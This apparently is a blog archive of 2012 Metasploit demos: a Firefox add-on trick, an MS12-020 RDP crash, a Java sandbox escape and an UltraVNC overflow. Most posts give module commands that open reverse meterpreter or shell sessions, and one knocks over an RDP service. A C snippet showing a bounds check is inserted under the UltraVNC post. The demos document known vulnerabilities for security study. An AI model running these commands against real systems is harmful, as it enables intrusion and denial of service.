Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

Timeline :

Vulnerability found by Jason Avery on 2007-06-27
Metasploit PoC provided on 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks "Install", the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this works without a restart because the add-on is marked as "bootstrapped". Since the add-on would otherwise execute the payload again after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo

Timeline :

Vulnerability found by Luigi Auriemma on 2011-05-16
Vulnerability reported by Luigi Auriemma to ZDI
Vulnerability reported to the vendor by ZDI on 2011-08-24
Coordinated public release of the vulnerability on 2012-03-13
Metasploit PoC provided on 2012-03-19
Details of the vulnerability published by Luigi Auriemma on 2012-05-16

PoC provided by :

Luigi Auriemma
Daniel Godas-Lopez
Alex Ionescu
jduck

Reference(s) :

CVE-2012-0002
MS12-020
ZDI-12-044
OSVDB-80004

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32-bit SP2
Windows Server 2008 x64 SP2
Windows 7 32-bit and Windows 7 32-bit SP1
Windows 7 x64 and Windows 7 x64 SP1
Windows Server 2008 R2 x64 and Windows Server 2008 R2 x64 SP1

Tested on Windows XP Pro SP3

Description :

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw lies in the way the maxChannelIDs field of the T.125 ConnectMCSPDU packet is handled: an invalid pointer is used, causing a denial-of-service condition.

Commands :

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.178.22
exploit

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters on 2011-08-01
Coordinated public release of the vulnerability on 2012-02-14
Details of the vulnerability published by Jeroen Frijters on 2012-02-23
Metasploit PoC provided on 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability arising from the fact that AtomicReferenceArray uses the Unsafe class to store a reference directly into an array, which can violate type safety if not used properly. This provides a way to escape the JRE sandbox and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
set SRVHOST 192.168.178.100
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.178.100
exploit

CVE-2008-0610 UltraVNC 1.0.2 Client Buffer Overflow Metasploit Demo

Timeline :

Vulnerability reported by the vendor on 2008-02-08
Metasploit PoC provided on 2012-03-26

PoC provided by :

noperand

Reference(s) :

CVE-2008-0610
OSVDB-42840

Affected version(s) :

UltraVNC Viewer 1.0.2 and 1.0.4 RC

Tested on Windows XP Pro SP3 with :

UltraVNC Viewer 1.0.2

Description :

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, the client subsequently reads a 32-bit integer from the TCP stream and uses it directly as the trusted size for a further read from the TCP stream into a 1024-byte character array on the stack.
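The length-handling mistake described above, as an added illustration that is not part of this post or of UltraVNC's code: the client must compare the server-announced length against its own buffer before reading. The in-memory stream, the big-endian length prefix (the RFB convention) and the function names are assumptions of this example; the 1024-byte buffer size comes from the description.

```c
#include <stdint.h>
#include <string.h>

#define CLIENT_BUF_SIZE 1024   /* the viewer's fixed stack buffer named in the description */

/* Constructed stand-in for the TCP stream the viewer reads from. */
typedef struct { const uint8_t *data; size_t len; size_t pos; } stream_t;

/* Copy exactly n bytes out of the stream; 0 on short read, 1 on success. */
static int stream_read(stream_t *s, void *out, size_t n) {
    if (s->len - s->pos < n) return 0;
    memcpy(out, s->data + s->pos, n);
    s->pos += n;
    return 1;
}

/* Hardened read of a length-prefixed server string into buf of capacity cap.
 * The vulnerable pattern read the 32-bit length and passed it straight to the
 * next read; here the announced length is bounded by cap before any copy.
 * Returns bytes copied, -1 on short read, -2 when the server lies about size. */
int read_server_string(stream_t *s, char *buf, size_t cap) {
    uint8_t raw[4];
    if (!stream_read(s, raw, 4)) return -1;
    uint32_t n = ((uint32_t)raw[0] << 24) | ((uint32_t)raw[1] << 16) |
                 ((uint32_t)raw[2] << 8)  |  (uint32_t)raw[3];   /* big-endian */
    if (n > cap) return -2;                 /* the missing check */
    if (!stream_read(s, buf, n)) return -1;
    return (int)n;
}

/* A well-behaved server announces 5 bytes and sends them. */
int demo_accepts_short_string(void) {
    static const uint8_t msg[] = {0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o'};
    stream_t s = {msg, sizeof msg, 0};
    char buf[CLIENT_BUF_SIZE];
    int n = read_server_string(&s, buf, sizeof buf);
    return n == 5 && memcmp(buf, "hello", 5) == 0;
}

/* A server announcing 0x7fffffff bytes is rejected before any copy happens. */
int demo_rejects_oversized_length(void) {
    static const uint8_t msg[] = {0x7f, 0xff, 0xff, 0xff};
    stream_t s = {msg, sizeof msg, 0};
    char buf[CLIENT_BUF_SIZE];
    return read_server_string(&s, buf, sizeof buf) == -2;
}
```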

Commands :

use exploit/windows/vnc/ultravnc_viewer_bof
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid